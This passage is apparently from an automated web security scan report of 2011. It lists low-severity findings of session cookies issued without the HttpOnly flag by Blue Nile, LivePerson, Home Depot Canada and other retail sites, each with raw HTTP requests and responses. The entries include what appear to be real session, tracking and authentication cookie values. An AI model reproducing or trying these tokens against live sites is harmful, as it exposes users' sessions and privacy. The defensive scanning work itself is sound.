//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=typingInvitationText

if( typeof( lpMTagConfig.plugins ) == 'undefined' ) {
lpMTagConfig.plugins =
...[SNIP]...

13.6. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAQDSSTRR=ACJDBBFDGDPABJDMIHHAPGKH; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=1402662&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 13 May 2011 18:23:05 GMT
Content-Length: 8868
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDAQDSSTRR=ACJDBBFDGDPABJDMIHHAPGKH; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 1402662
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=typingInvitationText

if( typeof( lpMTagConfig.plugins ) == 'undefined' ) {
lpMTagConfig.plugins =
...[SNIP]...

13.7. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQQDDBBA=CGMPNJDBEFBPCPENKNIKNPEG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=46281118&d_id=service-petco HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305511139578

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:13:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 13 May 2011 18:23:05 GMT
Content-Length: 14862
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQQDDBBA=CGMPNJDBEFBPCPENKNIKNPEG; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 46281118
lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=sendLPVarsFromPage,genericEventsBridge
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig
...[SNIP]...

13.8. https://secure.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.9. https://secure.bluenile.com/926308692/bundles/core.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/926308692/bundles/core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /926308692/bundles/core.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:45 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:48 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 141182

LoadState=function(){return{arrDOMLoadQueue:[],arrUnLoadQueue:[],arrLoadQueue:[],arrLoadTimes:[],arrFinished:[],done:false,timer:null,behaviours_done:true,addToLoadQueue:function(B,C,A){this.behaviour
...[SNIP]...

13.10. https://secure.bluenile.com/984568475/css/footer.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/984568475/css/footer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=3EF299F7A8884324F97ECFB6EE6789CF; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /984568475/css/footer.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
Cache-Control: max-age=0
If-Modified-Since: Sun, 06 Nov 2005 12:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: 2740050219
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 304 Not Modified
Content-Length: 0
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=3EF299F7A8884324F97ECFB6EE6789CF; Path=/; Secure
Date: Mon, 16 May 2011 10:18:57 GMT

13.11. https://secure.bluenile.com/N1374326862/bundles/cart.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N1374326862/bundles/cart.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=D13F3BAEE89FC25F9DABFECE8CDD8C0E; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N1374326862/bundles/cart.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:36 GMT
Content-Type: text/css;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:39 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=D13F3BAEE89FC25F9DABFECE8CDD8C0E; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 48865

.content H4, #sign-in-overlay h4, #sign-in-overlay h3{margin:0 0 10px 0;font-size:18px;font-weight:normal;color:#152551;font-variant:small-caps;font-family:"Times New Roman", Times, serif;}p, li, h1,
...[SNIP]...

13.12. https://secure.bluenile.com/N1991330425/js/navigation_flyouts_menu.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N1991330425/js/navigation_flyouts_menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9469FAAE73DD1B8776560654EE6CD4D3; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N1991330425/js/navigation_flyouts_menu.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 10:18:56 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 10:18:58 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=9469FAAE73DD1B8776560654EE6CD4D3; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 7197

$(document).ready(function(){var D=$("#bn_page_data").attr("data-site-server-name");D=(D===undefined)?"":D;if(D!=""&&D.indexOf("http")==-1){D="http://"+D}var E=$("#bn_page_data").attr("data-site-secur
...[SNIP]...

13.13. https://secure.bluenile.com/N3371804/bundles/allpages.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N3371804/bundles/allpages.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=72FEB7F4A023220F2EC65B8F2F2CEFA4; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N3371804/bundles/allpages.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 10:18:58 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 10:19:00 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=72FEB7F4A023220F2EC65B8F2F2CEFA4; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 12134

var BN=function(){var A={};A.namespace=function(B){if(A[B]==undefined){A[B]={}}};return A}();try{console.assert(1)}catch(e){console={log:function(){},assert:function(){},warn:function(){}}}$.ajaxSetup
...[SNIP]...

13.14. https://secure.bluenile.com/N3821919/bundles/footer.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N3821919/bundles/footer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5FF1A92F04EB693216D82D74D5A4299B; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N3821919/bundles/footer.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:36 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:39 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=5FF1A92F04EB693216D82D74D5A4299B; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 129785

BN.namespace("footer");BN.namespace("footer.facebook");BN.namespace("footer.overlay");BN.namespace("footer.international");$(document).ready(function(){BN.footer.showingSpecialOfferModule=($("#special
...[SNIP]...

13.15. https://secure.bluenile.com/N518116487/bundles/allpages.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N518116487/bundles/allpages.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B5E235EBCC9DDACFB3C2FE48FA5D4CCF; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N518116487/bundles/allpages.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:36 GMT
Content-Type: text/css;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:39 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=B5E235EBCC9DDACFB3C2FE48FA5D4CCF; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 30549

.alignRight{text-align:right}.alignLeft{text-align:left}.alignCenter{text-align:center;}.block{display:block;}.buttonLg{background:transparent url(https://secure.footprint.net/bnsecure/assets/chrome/b
...[SNIP]...

13.16. https://secure.bluenile.com/N522719515/bundles/ga.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N522719515/bundles/ga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A065C1EE3514BFC48CEC05FA8520967F; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N522719515/bundles/ga.js HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; JSESSIONID=C428FA1310BECEF5684ADEE95F231C12; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Date: Mon, 16 May 2011 01:58:34 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Expires: Sun, 16 May 2021 01:58:37 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=A065C1EE3514BFC48CEC05FA8520967F; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 24440

(function(){var u="_gat",AK="_gaq",AJ=true,AI=false,AH=undefined,AD="4.5.7",AG="length",AF="cookie",t="location",r="&",q="=",p="__utma=",o="__utmb=",n="__utmc=",x="__utmk=",m="__utmv=",l="__utmz=",k="
...[SNIP]...

13.17. https://secure.bluenile.com/N688855944/css/cart_print.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/N688855944/css/cart_print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C41065F23F1B09EAE20BE963A0C9B108; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /N688855944/css/cart_print.css HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: https://secure.bluenile.com/accounts/account-sign-in.html
Cache-Control: max-age=0
If-Modified-Since: Sun, 06 Nov 2005 12:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: 2740050219
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=BD3C1F2214BB0D9BDAA225DE12F8DC7A; stc=3NZR3Q

Response

HTTP/1.1 304 Not Modified
Content-Length: 0
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C41065F23F1B09EAE20BE963A0C9B108; Path=/; Secure
Date: Mon, 16 May 2011 10:18:54 GMT

13.18. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.19. https://secure.bluenile.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bluenile.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=EA10D33975247F9BC51C69DD0D98B7B9; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; JSESSIONID=F2B3F127105095FA0FA90CE2FE7A6C84; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.2.10.1305510928

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:02 GMT
Last-Modified: Wed, 11 May 2011 18:58:22 GMT
Accept-Ranges: bytes
ETag: W/"1406-1305140302000"
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=EA10D33975247F9BC51C69DD0D98B7B9; Path=/; Secure
Vary: Accept-Encoding
Content-Length: 1406

..............h.......(....... ............................................................................................................................//..SS..kg.................................
...[SNIP]...

13.20. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.homedepot.ca
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.21. http://t.p.mybuys.com/webrec/wr.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.22. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQQCDBDDC=GGABBBEAJKJGPEAHHBLHBFPE; path=/
